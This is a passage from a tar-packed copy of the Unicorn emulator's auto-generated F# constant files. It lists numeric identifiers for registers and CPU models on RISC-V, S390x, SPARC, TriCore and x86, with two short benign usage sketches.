UC_RISCV_REG_HTIMEDELTA = 156 let UC_RISCV_REG_HTIMEDELTAH = 157 // Floating-point registers let UC_RISCV_REG_F0 = 158 let UC_RISCV_REG_F1 = 159 let UC_RISCV_REG_F2 = 160 let UC_RISCV_REG_F3 = 161 let UC_RISCV_REG_F4 = 162 let UC_RISCV_REG_F5 = 163 let UC_RISCV_REG_F6 = 164 let UC_RISCV_REG_F7 = 165 let UC_RISCV_REG_F8 = 166 let UC_RISCV_REG_F9 = 167 let UC_RISCV_REG_F10 = 168 let UC_RISCV_REG_F11 = 169 let UC_RISCV_REG_F12 = 170 let UC_RISCV_REG_F13 = 171 let UC_RISCV_REG_F14 = 172 let UC_RISCV_REG_F15 = 173 let UC_RISCV_REG_F16 = 174 let UC_RISCV_REG_F17 = 175 let UC_RISCV_REG_F18 = 176 let UC_RISCV_REG_F19 = 177 let UC_RISCV_REG_F20 = 178 let UC_RISCV_REG_F21 = 179 let UC_RISCV_REG_F22 = 180 let UC_RISCV_REG_F23 = 181 let UC_RISCV_REG_F24 = 182 let UC_RISCV_REG_F25 = 183 let UC_RISCV_REG_F26 = 184 let UC_RISCV_REG_F27 = 185 let UC_RISCV_REG_F28 = 186 let UC_RISCV_REG_F29 = 187 let UC_RISCV_REG_F30 = 188 let UC_RISCV_REG_F31 = 189 let UC_RISCV_REG_PC = 190 let UC_RISCV_REG_ENDING = 191 // Alias registers let UC_RISCV_REG_ZERO = 1 let UC_RISCV_REG_RA = 2 let UC_RISCV_REG_SP = 3 let UC_RISCV_REG_GP = 4 let UC_RISCV_REG_TP = 5 let UC_RISCV_REG_T0 = 6 let UC_RISCV_REG_T1 = 7 let UC_RISCV_REG_T2 = 8 let UC_RISCV_REG_S0 = 9 let UC_RISCV_REG_FP = 9 let UC_RISCV_REG_S1 = 10 let UC_RISCV_REG_A0 = 11 let UC_RISCV_REG_A1 = 12 let UC_RISCV_REG_A2 = 13 let UC_RISCV_REG_A3 = 14 let UC_RISCV_REG_A4 = 15 let UC_RISCV_REG_A5 = 16 let UC_RISCV_REG_A6 = 17 let UC_RISCV_REG_A7 = 18 let UC_RISCV_REG_S2 = 19 let UC_RISCV_REG_S3 = 20 let UC_RISCV_REG_S4 = 21 let UC_RISCV_REG_S5 = 22 let UC_RISCV_REG_S6 = 23 let UC_RISCV_REG_S7 = 24 let UC_RISCV_REG_S8 = 25 let UC_RISCV_REG_S9 = 26 let UC_RISCV_REG_S10 = 27 let UC_RISCV_REG_S11 = 28 let UC_RISCV_REG_T3 = 29 let UC_RISCV_REG_T4 = 30 let UC_RISCV_REG_T5 = 31 let UC_RISCV_REG_T6 = 32 let UC_RISCV_REG_FT0 = 158 let UC_RISCV_REG_FT1 = 159 let UC_RISCV_REG_FT2 = 160 let UC_RISCV_REG_FT3 = 161 let UC_RISCV_REG_FT4 = 162 let UC_RISCV_REG_FT5 = 163 let UC_RISCV_REG_FT6 = 164 let UC_RISCV_REG_FT7 = 165 let UC_RISCV_REG_FS0 = 166 let UC_RISCV_REG_FS1 = 167 let UC_RISCV_REG_FA0 = 168 let UC_RISCV_REG_FA1 = 169 let UC_RISCV_REG_FA2 = 170 let UC_RISCV_REG_FA3 = 171 let UC_RISCV_REG_FA4 = 172 let UC_RISCV_REG_FA5 = 173 let UC_RISCV_REG_FA6 = 174 let UC_RISCV_REG_FA7 = 175 let UC_RISCV_REG_FS2 = 176 let UC_RISCV_REG_FS3 = 177 let UC_RISCV_REG_FS4 = 178 let UC_RISCV_REG_FS5 = 179 let UC_RISCV_REG_FS6 = 180 let UC_RISCV_REG_FS7 = 181 let UC_RISCV_REG_FS8 = 182 let UC_RISCV_REG_FS9 = 183 let UC_RISCV_REG_FS10 = 184 let UC_RISCV_REG_FS11 = 185 let UC_RISCV_REG_FT8 = 186 let UC_RISCV_REG_FT9 = 187 let UC_RISCV_REG_FT10 = 188 let UC_RISCV_REG_FT11 = 189 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/S390x.fs000066400000000000000000000067271467524106700233230ustar00rootroot00000000000000// For Unicorn Engine. 
unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/S390x.fs

// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT

namespace UnicornEngine.Const

open System

[<AutoOpen>]
module S390x =

    // S390X CPU
    let UC_CPU_S390X_Z900 = 0
    let UC_CPU_S390X_Z900_2 = 1
    let UC_CPU_S390X_Z900_3 = 2
    let UC_CPU_S390X_Z800 = 3
    let UC_CPU_S390X_Z990 = 4
    let UC_CPU_S390X_Z990_2 = 5
    let UC_CPU_S390X_Z990_3 = 6
    let UC_CPU_S390X_Z890 = 7
    let UC_CPU_S390X_Z990_4 = 8
    let UC_CPU_S390X_Z890_2 = 9
    let UC_CPU_S390X_Z990_5 = 10
    let UC_CPU_S390X_Z890_3 = 11
    let UC_CPU_S390X_Z9EC = 12
    let UC_CPU_S390X_Z9EC_2 = 13
    let UC_CPU_S390X_Z9BC = 14
    let UC_CPU_S390X_Z9EC_3 = 15
    let UC_CPU_S390X_Z9BC_2 = 16
    let UC_CPU_S390X_Z10EC = 17
    let UC_CPU_S390X_Z10EC_2 = 18
    let UC_CPU_S390X_Z10BC = 19
    let UC_CPU_S390X_Z10EC_3 = 20
    let UC_CPU_S390X_Z10BC_2 = 21
    let UC_CPU_S390X_Z196 = 22
    let UC_CPU_S390X_Z196_2 = 23
    let UC_CPU_S390X_Z114 = 24
    let UC_CPU_S390X_ZEC12 = 25
    let UC_CPU_S390X_ZEC12_2 = 26
    let UC_CPU_S390X_ZBC12 = 27
    let UC_CPU_S390X_Z13 = 28
    let UC_CPU_S390X_Z13_2 = 29
    let UC_CPU_S390X_Z13S = 30
    let UC_CPU_S390X_Z14 = 31
    let UC_CPU_S390X_Z14_2 = 32
    let UC_CPU_S390X_Z14ZR1 = 33
    let UC_CPU_S390X_GEN15A = 34
    let UC_CPU_S390X_GEN15B = 35
    let UC_CPU_S390X_QEMU = 36
    let UC_CPU_S390X_MAX = 37
    let UC_CPU_S390X_ENDING = 38

    // S390X registers
    let UC_S390X_REG_INVALID = 0

    // General purpose registers
    let UC_S390X_REG_R0 = 1
    let UC_S390X_REG_R1 = 2
    let UC_S390X_REG_R2 = 3
    let UC_S390X_REG_R3 = 4
    let UC_S390X_REG_R4 = 5
    let UC_S390X_REG_R5 = 6
    let UC_S390X_REG_R6 = 7
    let UC_S390X_REG_R7 = 8
    let UC_S390X_REG_R8 = 9
    let UC_S390X_REG_R9 = 10
    let UC_S390X_REG_R10 = 11
    let UC_S390X_REG_R11 = 12
    let UC_S390X_REG_R12 = 13
    let UC_S390X_REG_R13 = 14
    let UC_S390X_REG_R14 = 15
    let UC_S390X_REG_R15 = 16

    // Floating point registers
    let UC_S390X_REG_F0 = 17
    let UC_S390X_REG_F1 = 18
    let UC_S390X_REG_F2 = 19
    let UC_S390X_REG_F3 = 20
    let UC_S390X_REG_F4 = 21
    let UC_S390X_REG_F5 = 22
    let UC_S390X_REG_F6 = 23
    let UC_S390X_REG_F7 = 24
    let UC_S390X_REG_F8 = 25
    let UC_S390X_REG_F9 = 26
    let UC_S390X_REG_F10 = 27
    let UC_S390X_REG_F11 = 28
    let UC_S390X_REG_F12 = 29
    let UC_S390X_REG_F13 = 30
    let UC_S390X_REG_F14 = 31
    let UC_S390X_REG_F15 = 32
    let UC_S390X_REG_F16 = 33
    let UC_S390X_REG_F17 = 34
    let UC_S390X_REG_F18 = 35
    let UC_S390X_REG_F19 = 36
    let UC_S390X_REG_F20 = 37
    let UC_S390X_REG_F21 = 38
    let UC_S390X_REG_F22 = 39
    let UC_S390X_REG_F23 = 40
    let UC_S390X_REG_F24 = 41
    let UC_S390X_REG_F25 = 42
    let UC_S390X_REG_F26 = 43
    let UC_S390X_REG_F27 = 44
    let UC_S390X_REG_F28 = 45
    let UC_S390X_REG_F29 = 46
    let UC_S390X_REG_F30 = 47
    let UC_S390X_REG_F31 = 48

    // Access registers
    let UC_S390X_REG_A0 = 49
    let UC_S390X_REG_A1 = 50
    let UC_S390X_REG_A2 = 51
    let UC_S390X_REG_A3 = 52
    let UC_S390X_REG_A4 = 53
    let UC_S390X_REG_A5 = 54
    let UC_S390X_REG_A6 = 55
    let UC_S390X_REG_A7 = 56
    let UC_S390X_REG_A8 = 57
    let UC_S390X_REG_A9 = 58
    let UC_S390X_REG_A10 = 59
    let UC_S390X_REG_A11 = 60
    let UC_S390X_REG_A12 = 61
    let UC_S390X_REG_A13 = 62
    let UC_S390X_REG_A14 = 63
    let UC_S390X_REG_A15 = 64
    let UC_S390X_REG_PC = 65
    let UC_S390X_REG_PSWM = 66
    let UC_S390X_REG_ENDING = 67

    // Alias registers
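// ---- usage sketch (not part of the repository) ------------------------------
// Because the register ids above are allocated contiguously (R0..R15 = 1..16,
// F0..F31 = 17..48, A0..A15 = 49..64), an id can be computed instead of
// spelled out. A sketch under that assumption; the helper name is hypothetical:
open UnicornEngine
open UnicornEngine.Const

let dumpS390xGprs (uc: Unicorn) =
    for i in 0 .. 15 do
        let v = uc.RegRead(UC_S390X_REG_R0 + i)   // ids 1..16 are contiguous
        printfn "r%d = 0x%016x" i v
// -----------------------------------------------------------------------------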
unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Sparc.fs

// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT

namespace UnicornEngine.Const

open System

[<AutoOpen>]
module Sparc =

    // SPARC32 CPU
    let UC_CPU_SPARC32_FUJITSU_MB86904 = 0
    let UC_CPU_SPARC32_FUJITSU_MB86907 = 1
    let UC_CPU_SPARC32_TI_MICROSPARC_I = 2
    let UC_CPU_SPARC32_TI_MICROSPARC_II = 3
    let UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4
    let UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5
    let UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6
    let UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7
    let UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8
    let UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9
    let UC_CPU_SPARC32_TI_SUPERSPARC_II = 10
    let UC_CPU_SPARC32_LEON2 = 11
    let UC_CPU_SPARC32_LEON3 = 12
    let UC_CPU_SPARC32_ENDING = 13

    // SPARC64 CPU
    let UC_CPU_SPARC64_FUJITSU = 0
    let UC_CPU_SPARC64_FUJITSU_III = 1
    let UC_CPU_SPARC64_FUJITSU_IV = 2
    let UC_CPU_SPARC64_FUJITSU_V = 3
    let UC_CPU_SPARC64_TI_ULTRASPARC_I = 4
    let UC_CPU_SPARC64_TI_ULTRASPARC_II = 5
    let UC_CPU_SPARC64_TI_ULTRASPARC_III = 6
    let UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7
    let UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8
    let UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9
    let UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10
    let UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11
    let UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12
    let UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13
    let UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14
    let UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15
    let UC_CPU_SPARC64_NEC_ULTRASPARC_I = 16
    let UC_CPU_SPARC64_ENDING = 17

    // SPARC registers
    let UC_SPARC_REG_INVALID = 0
    let UC_SPARC_REG_F0 = 1
    let UC_SPARC_REG_F1 = 2
    let UC_SPARC_REG_F2 = 3
    let UC_SPARC_REG_F3 = 4
    let UC_SPARC_REG_F4 = 5
    let UC_SPARC_REG_F5 = 6
    let UC_SPARC_REG_F6 = 7
    let UC_SPARC_REG_F7 = 8
    let UC_SPARC_REG_F8 = 9
    let UC_SPARC_REG_F9 = 10
    let UC_SPARC_REG_F10 = 11
    let UC_SPARC_REG_F11 = 12
    let UC_SPARC_REG_F12 = 13
    let UC_SPARC_REG_F13 = 14
    let UC_SPARC_REG_F14 = 15
    let UC_SPARC_REG_F15 = 16
    let UC_SPARC_REG_F16 = 17
    let UC_SPARC_REG_F17 = 18
    let UC_SPARC_REG_F18 = 19
    let UC_SPARC_REG_F19 = 20
    let UC_SPARC_REG_F20 = 21
    let UC_SPARC_REG_F21 = 22
    let UC_SPARC_REG_F22 = 23
    let UC_SPARC_REG_F23 = 24
    let UC_SPARC_REG_F24 = 25
    let UC_SPARC_REG_F25 = 26
    let UC_SPARC_REG_F26 = 27
    let UC_SPARC_REG_F27 = 28
    let UC_SPARC_REG_F28 = 29
    let UC_SPARC_REG_F29 = 30
    let UC_SPARC_REG_F30 = 31
    let UC_SPARC_REG_F31 = 32
    let UC_SPARC_REG_F32 = 33
    let UC_SPARC_REG_F34 = 34
    let UC_SPARC_REG_F36 = 35
    let UC_SPARC_REG_F38 = 36
    let UC_SPARC_REG_F40 = 37
    let UC_SPARC_REG_F42 = 38
    let UC_SPARC_REG_F44 = 39
    let UC_SPARC_REG_F46 = 40
    let UC_SPARC_REG_F48 = 41
    let UC_SPARC_REG_F50 = 42
    let UC_SPARC_REG_F52 = 43
    let UC_SPARC_REG_F54 = 44
    let UC_SPARC_REG_F56 = 45
    let UC_SPARC_REG_F58 = 46
    let UC_SPARC_REG_F60 = 47
    let UC_SPARC_REG_F62 = 48
    let UC_SPARC_REG_FCC0 = 49
    let UC_SPARC_REG_FCC1 = 50
    let UC_SPARC_REG_FCC2 = 51
    let UC_SPARC_REG_FCC3 = 52
    let UC_SPARC_REG_G0 = 53
    let UC_SPARC_REG_G1 = 54
    let UC_SPARC_REG_G2 = 55
    let UC_SPARC_REG_G3 = 56
    let UC_SPARC_REG_G4 = 57
    let UC_SPARC_REG_G5 = 58
    let UC_SPARC_REG_G6 = 59
    let UC_SPARC_REG_G7 = 60
    let UC_SPARC_REG_I0 = 61
    let UC_SPARC_REG_I1 = 62
    let UC_SPARC_REG_I2 = 63
    let UC_SPARC_REG_I3 = 64
    let UC_SPARC_REG_I4 = 65
    let UC_SPARC_REG_I5 = 66
    let UC_SPARC_REG_FP = 67
    let UC_SPARC_REG_I7 = 68
    let UC_SPARC_REG_ICC = 69
    let UC_SPARC_REG_L0 = 70
    let UC_SPARC_REG_L1 = 71
    let UC_SPARC_REG_L2 = 72
    let UC_SPARC_REG_L3 = 73
    let UC_SPARC_REG_L4 = 74
    let UC_SPARC_REG_L5 = 75
    let UC_SPARC_REG_L6 = 76
    let UC_SPARC_REG_L7 = 77
    let UC_SPARC_REG_O0 = 78
    let UC_SPARC_REG_O1 = 79
    let UC_SPARC_REG_O2 = 80
    let UC_SPARC_REG_O3 = 81
    let UC_SPARC_REG_O4 = 82
    let UC_SPARC_REG_O5 = 83
    let UC_SPARC_REG_SP = 84
    let UC_SPARC_REG_O7 = 85
    let UC_SPARC_REG_Y = 86
    let UC_SPARC_REG_XCC = 87
    let UC_SPARC_REG_PC = 88
    let UC_SPARC_REG_ENDING = 89
    let UC_SPARC_REG_O6 = 84
    let UC_SPARC_REG_I6 = 67
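// ---- usage sketch (not part of the repository) ------------------------------
// Note the overlapping ids at the end of the list: UC_SPARC_REG_O6 = 84 is the
// same slot as UC_SPARC_REG_SP, and UC_SPARC_REG_I6 = 67 the same slot as
// UC_SPARC_REG_FP, matching the SPARC convention that %o6 is the stack pointer
// and %i6 the frame pointer of the current register window. A minimal sketch:
open UnicornEngine
open UnicornEngine.Const

let demoSparcAliases (uc: Unicorn) =
    uc.RegWrite(UC_SPARC_REG_O6, 0x2000L)
    let sp = uc.RegRead(UC_SPARC_REG_SP)   // reads the value written via O6
    printfn "sp = 0x%x" sp
// -----------------------------------------------------------------------------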
unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/TriCore.fs

// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT

namespace UnicornEngine.Const

open System

[<AutoOpen>]
module TriCore =

    // TRICORE CPU
    let UC_CPU_TRICORE_TC1796 = 0
    let UC_CPU_TRICORE_TC1797 = 1
    let UC_CPU_TRICORE_TC27X = 2
    let UC_CPU_TRICORE_ENDING = 3

    // TRICORE registers
    let UC_TRICORE_REG_INVALID = 0
    let UC_TRICORE_REG_A0 = 1
    let UC_TRICORE_REG_A1 = 2
    let UC_TRICORE_REG_A2 = 3
    let UC_TRICORE_REG_A3 = 4
    let UC_TRICORE_REG_A4 = 5
    let UC_TRICORE_REG_A5 = 6
    let UC_TRICORE_REG_A6 = 7
    let UC_TRICORE_REG_A7 = 8
    let UC_TRICORE_REG_A8 = 9
    let UC_TRICORE_REG_A9 = 10
    let UC_TRICORE_REG_A10 = 11
    let UC_TRICORE_REG_A11 = 12
    let UC_TRICORE_REG_A12 = 13
    let UC_TRICORE_REG_A13 = 14
    let UC_TRICORE_REG_A14 = 15
    let UC_TRICORE_REG_A15 = 16
    let UC_TRICORE_REG_D0 = 17
    let UC_TRICORE_REG_D1 = 18
    let UC_TRICORE_REG_D2 = 19
    let UC_TRICORE_REG_D3 = 20
    let UC_TRICORE_REG_D4 = 21
    let UC_TRICORE_REG_D5 = 22
    let UC_TRICORE_REG_D6 = 23
    let UC_TRICORE_REG_D7 = 24
    let UC_TRICORE_REG_D8 = 25
    let UC_TRICORE_REG_D9 = 26
    let UC_TRICORE_REG_D10 = 27
    let UC_TRICORE_REG_D11 = 28
    let UC_TRICORE_REG_D12 = 29
    let UC_TRICORE_REG_D13 = 30
    let UC_TRICORE_REG_D14 = 31
    let UC_TRICORE_REG_D15 = 32
    let UC_TRICORE_REG_PCXI = 33
    let UC_TRICORE_REG_PSW = 34
    let UC_TRICORE_REG_PSW_USB_C = 35
    let UC_TRICORE_REG_PSW_USB_V = 36
    let UC_TRICORE_REG_PSW_USB_SV = 37
    let UC_TRICORE_REG_PSW_USB_AV = 38
    let UC_TRICORE_REG_PSW_USB_SAV = 39
    let UC_TRICORE_REG_PC = 40
    let UC_TRICORE_REG_SYSCON = 41
    let UC_TRICORE_REG_CPU_ID = 42
    let UC_TRICORE_REG_BIV = 43
    let UC_TRICORE_REG_BTV = 44
    let UC_TRICORE_REG_ISP = 45
    let UC_TRICORE_REG_ICR = 46
    let UC_TRICORE_REG_FCX = 47
    let UC_TRICORE_REG_LCX = 48
    let UC_TRICORE_REG_COMPAT = 49
    let UC_TRICORE_REG_DPR0_U = 50
    let UC_TRICORE_REG_DPR1_U = 51
    let UC_TRICORE_REG_DPR2_U = 52
    let UC_TRICORE_REG_DPR3_U = 53
    let UC_TRICORE_REG_DPR0_L = 54
    let UC_TRICORE_REG_DPR1_L = 55
    let UC_TRICORE_REG_DPR2_L = 56
    let UC_TRICORE_REG_DPR3_L = 57
    let UC_TRICORE_REG_CPR0_U = 58
    let UC_TRICORE_REG_CPR1_U = 59
    let UC_TRICORE_REG_CPR2_U = 60
    let UC_TRICORE_REG_CPR3_U = 61
    let UC_TRICORE_REG_CPR0_L = 62
    let UC_TRICORE_REG_CPR1_L = 63
    let UC_TRICORE_REG_CPR2_L = 64
    let UC_TRICORE_REG_CPR3_L = 65
    let UC_TRICORE_REG_DPM0 = 66
    let UC_TRICORE_REG_DPM1 = 67
    let UC_TRICORE_REG_DPM2 = 68
    let UC_TRICORE_REG_DPM3 = 69
    let UC_TRICORE_REG_CPM0 = 70
    let UC_TRICORE_REG_CPM1 = 71
    let UC_TRICORE_REG_CPM2 = 72
    let UC_TRICORE_REG_CPM3 = 73
    let UC_TRICORE_REG_MMU_CON = 74
    let UC_TRICORE_REG_MMU_ASI = 75
    let UC_TRICORE_REG_MMU_TVA = 76
    let UC_TRICORE_REG_MMU_TPA = 77
    let UC_TRICORE_REG_MMU_TPX = 78
    let UC_TRICORE_REG_MMU_TFA = 79
    let UC_TRICORE_REG_BMACON = 80
    let UC_TRICORE_REG_SMACON = 81
    let UC_TRICORE_REG_DIEAR = 82
    let UC_TRICORE_REG_DIETR = 83
    let UC_TRICORE_REG_CCDIER = 84
    let UC_TRICORE_REG_MIECON = 85
    let UC_TRICORE_REG_PIEAR = 86
    let UC_TRICORE_REG_PIETR = 87
    let UC_TRICORE_REG_CCPIER = 88
    let UC_TRICORE_REG_DBGSR = 89
    let UC_TRICORE_REG_EXEVT = 90
    let UC_TRICORE_REG_CREVT = 91
    let UC_TRICORE_REG_SWEVT = 92
    let UC_TRICORE_REG_TR0EVT = 93
    let UC_TRICORE_REG_TR1EVT = 94
    let UC_TRICORE_REG_DMS = 95
    let UC_TRICORE_REG_DCX = 96
    let UC_TRICORE_REG_DBGTCR = 97
    let UC_TRICORE_REG_CCTRL = 98
    let UC_TRICORE_REG_CCNT = 99
    let UC_TRICORE_REG_ICNT = 100
    let UC_TRICORE_REG_M1CNT = 101
    let UC_TRICORE_REG_M2CNT = 102
    let UC_TRICORE_REG_M3CNT = 103
    let UC_TRICORE_REG_ENDING = 104
    let UC_TRICORE_REG_GA0 = 1
    let UC_TRICORE_REG_GA1 = 2
    let UC_TRICORE_REG_GA8 = 9
    let UC_TRICORE_REG_GA9 = 10
    let UC_TRICORE_REG_SP = 11
    let UC_TRICORE_REG_LR = 12
    let UC_TRICORE_REG_IA = 16
    let UC_TRICORE_REG_ID = 32

unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/X86.fs

// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT

namespace UnicornEngine.Const

open System

[<AutoOpen>]
module X86 =

    // X86 CPU
    let UC_CPU_X86_QEMU64 = 0
    let UC_CPU_X86_PHENOM = 1
    let UC_CPU_X86_CORE2DUO = 2
    let UC_CPU_X86_KVM64 = 3
    let UC_CPU_X86_QEMU32 = 4
    let UC_CPU_X86_KVM32 = 5
    let UC_CPU_X86_COREDUO = 6
    let UC_CPU_X86_486 = 7
    let UC_CPU_X86_PENTIUM = 8
    let UC_CPU_X86_PENTIUM2 = 9
    let UC_CPU_X86_PENTIUM3 = 10
    let UC_CPU_X86_ATHLON = 11
    let UC_CPU_X86_N270 = 12
    let UC_CPU_X86_CONROE = 13
    let UC_CPU_X86_PENRYN = 14
    let UC_CPU_X86_NEHALEM = 15
    let UC_CPU_X86_WESTMERE = 16
    let UC_CPU_X86_SANDYBRIDGE = 17
    let UC_CPU_X86_IVYBRIDGE = 18
    let UC_CPU_X86_HASWELL = 19
    let UC_CPU_X86_BROADWELL = 20
    let UC_CPU_X86_SKYLAKE_CLIENT = 21
    let UC_CPU_X86_SKYLAKE_SERVER = 22
    let UC_CPU_X86_CASCADELAKE_SERVER = 23
    let UC_CPU_X86_COOPERLAKE = 24
    let UC_CPU_X86_ICELAKE_CLIENT = 25
    let UC_CPU_X86_ICELAKE_SERVER = 26
    let UC_CPU_X86_DENVERTON = 27
    let UC_CPU_X86_SNOWRIDGE = 28
    let UC_CPU_X86_KNIGHTSMILL = 29
    let UC_CPU_X86_OPTERON_G1 = 30
    let UC_CPU_X86_OPTERON_G2 = 31
    let UC_CPU_X86_OPTERON_G3 = 32
    let UC_CPU_X86_OPTERON_G4 = 33
    let UC_CPU_X86_OPTERON_G5 = 34
    let UC_CPU_X86_EPYC = 35
    let UC_CPU_X86_DHYANA = 36
    let UC_CPU_X86_EPYC_ROME = 37
    let UC_CPU_X86_ENDING = 38

    // X86 registers
    let UC_X86_REG_INVALID = 0
    let UC_X86_REG_AH = 1
    let UC_X86_REG_AL = 2
    let UC_X86_REG_AX = 3
    let UC_X86_REG_BH = 4
    let UC_X86_REG_BL = 5
    let UC_X86_REG_BP = 6
    let UC_X86_REG_BPL = 7
    let UC_X86_REG_BX = 8
    let UC_X86_REG_CH = 9
    let UC_X86_REG_CL = 10
    let UC_X86_REG_CS = 11
    let UC_X86_REG_CX = 12
    let UC_X86_REG_DH = 13
    let UC_X86_REG_DI = 14
    let UC_X86_REG_DIL = 15
    let UC_X86_REG_DL = 16
    let UC_X86_REG_DS = 17
    let UC_X86_REG_DX = 18
    let UC_X86_REG_EAX = 19
    let UC_X86_REG_EBP = 20
    let UC_X86_REG_EBX = 21
    let UC_X86_REG_ECX = 22
    let UC_X86_REG_EDI = 23
    let UC_X86_REG_EDX = 24
    let UC_X86_REG_EFLAGS = 25
    let UC_X86_REG_EIP = 26
    let UC_X86_REG_ES = 28
    let UC_X86_REG_ESI = 29
    let UC_X86_REG_ESP = 30
    let UC_X86_REG_FPSW = 31
    let UC_X86_REG_FS = 32
    let UC_X86_REG_GS = 33
    let UC_X86_REG_IP = 34
    let UC_X86_REG_RAX = 35
    let UC_X86_REG_RBP = 36
    let UC_X86_REG_RBX = 37
    let UC_X86_REG_RCX = 38
    let UC_X86_REG_RDI = 39
    let UC_X86_REG_RDX = 40
    let UC_X86_REG_RIP = 41
    let UC_X86_REG_RSI = 43
    let UC_X86_REG_RSP = 44
    let UC_X86_REG_SI = 45
    let UC_X86_REG_SIL = 46
    let UC_X86_REG_SP = 47
    let UC_X86_REG_SPL = 48
    let UC_X86_REG_SS = 49
    let UC_X86_REG_CR0 = 50
    let UC_X86_REG_CR1 = 51
    let UC_X86_REG_CR2 = 52
    let UC_X86_REG_CR3 = 53
    let UC_X86_REG_CR4 = 54
    let UC_X86_REG_CR8 = 58
    let UC_X86_REG_DR0 = 66
    let UC_X86_REG_DR1 = 67
    let UC_X86_REG_DR2 = 68
    let UC_X86_REG_DR3 = 69
    let UC_X86_REG_DR4 = 70
    let UC_X86_REG_DR5 = 71
    let UC_X86_REG_DR6 = 72
    let UC_X86_REG_DR7 = 73
    let UC_X86_REG_FP0 = 82
    let UC_X86_REG_FP1 = 83
    let UC_X86_REG_FP2 = 84
    let UC_X86_REG_FP3 = 85
    let UC_X86_REG_FP4 = 86
    let UC_X86_REG_FP5 = 87
    let UC_X86_REG_FP6 = 88
    let UC_X86_REG_FP7 = 89
    let UC_X86_REG_K0 = 90
    let UC_X86_REG_K1 = 91
    let UC_X86_REG_K2 = 92
    let UC_X86_REG_K3 = 93
    let UC_X86_REG_K4 = 94
let UC_X86_REG_K5 = 95 let UC_X86_REG_K6 = 96 let UC_X86_REG_K7 = 97 let UC_X86_REG_MM0 = 98 let UC_X86_REG_MM1 = 99 let UC_X86_REG_MM2 = 100 let UC_X86_REG_MM3 = 101 let UC_X86_REG_MM4 = 102 let UC_X86_REG_MM5 = 103 let UC_X86_REG_MM6 = 104 let UC_X86_REG_MM7 = 105 let UC_X86_REG_R8 = 106 let UC_X86_REG_R9 = 107 let UC_X86_REG_R10 = 108 let UC_X86_REG_R11 = 109 let UC_X86_REG_R12 = 110 let UC_X86_REG_R13 = 111 let UC_X86_REG_R14 = 112 let UC_X86_REG_R15 = 113 let UC_X86_REG_ST0 = 114 let UC_X86_REG_ST1 = 115 let UC_X86_REG_ST2 = 116 let UC_X86_REG_ST3 = 117 let UC_X86_REG_ST4 = 118 let UC_X86_REG_ST5 = 119 let UC_X86_REG_ST6 = 120 let UC_X86_REG_ST7 = 121 let UC_X86_REG_XMM0 = 122 let UC_X86_REG_XMM1 = 123 let UC_X86_REG_XMM2 = 124 let UC_X86_REG_XMM3 = 125 let UC_X86_REG_XMM4 = 126 let UC_X86_REG_XMM5 = 127 let UC_X86_REG_XMM6 = 128 let UC_X86_REG_XMM7 = 129 let UC_X86_REG_XMM8 = 130 let UC_X86_REG_XMM9 = 131 let UC_X86_REG_XMM10 = 132 let UC_X86_REG_XMM11 = 133 let UC_X86_REG_XMM12 = 134 let UC_X86_REG_XMM13 = 135 let UC_X86_REG_XMM14 = 136 let UC_X86_REG_XMM15 = 137 let UC_X86_REG_XMM16 = 138 let UC_X86_REG_XMM17 = 139 let UC_X86_REG_XMM18 = 140 let UC_X86_REG_XMM19 = 141 let UC_X86_REG_XMM20 = 142 let UC_X86_REG_XMM21 = 143 let UC_X86_REG_XMM22 = 144 let UC_X86_REG_XMM23 = 145 let UC_X86_REG_XMM24 = 146 let UC_X86_REG_XMM25 = 147 let UC_X86_REG_XMM26 = 148 let UC_X86_REG_XMM27 = 149 let UC_X86_REG_XMM28 = 150 let UC_X86_REG_XMM29 = 151 let UC_X86_REG_XMM30 = 152 let UC_X86_REG_XMM31 = 153 let UC_X86_REG_YMM0 = 154 let UC_X86_REG_YMM1 = 155 let UC_X86_REG_YMM2 = 156 let UC_X86_REG_YMM3 = 157 let UC_X86_REG_YMM4 = 158 let UC_X86_REG_YMM5 = 159 let UC_X86_REG_YMM6 = 160 let UC_X86_REG_YMM7 = 161 let UC_X86_REG_YMM8 = 162 let UC_X86_REG_YMM9 = 163 let UC_X86_REG_YMM10 = 164 let UC_X86_REG_YMM11 = 165 let UC_X86_REG_YMM12 = 166 let UC_X86_REG_YMM13 = 167 let UC_X86_REG_YMM14 = 168 let UC_X86_REG_YMM15 = 169 let UC_X86_REG_YMM16 = 170 let UC_X86_REG_YMM17 = 171 let UC_X86_REG_YMM18 = 172 let UC_X86_REG_YMM19 = 173 let UC_X86_REG_YMM20 = 174 let UC_X86_REG_YMM21 = 175 let UC_X86_REG_YMM22 = 176 let UC_X86_REG_YMM23 = 177 let UC_X86_REG_YMM24 = 178 let UC_X86_REG_YMM25 = 179 let UC_X86_REG_YMM26 = 180 let UC_X86_REG_YMM27 = 181 let UC_X86_REG_YMM28 = 182 let UC_X86_REG_YMM29 = 183 let UC_X86_REG_YMM30 = 184 let UC_X86_REG_YMM31 = 185 let UC_X86_REG_ZMM0 = 186 let UC_X86_REG_ZMM1 = 187 let UC_X86_REG_ZMM2 = 188 let UC_X86_REG_ZMM3 = 189 let UC_X86_REG_ZMM4 = 190 let UC_X86_REG_ZMM5 = 191 let UC_X86_REG_ZMM6 = 192 let UC_X86_REG_ZMM7 = 193 let UC_X86_REG_ZMM8 = 194 let UC_X86_REG_ZMM9 = 195 let UC_X86_REG_ZMM10 = 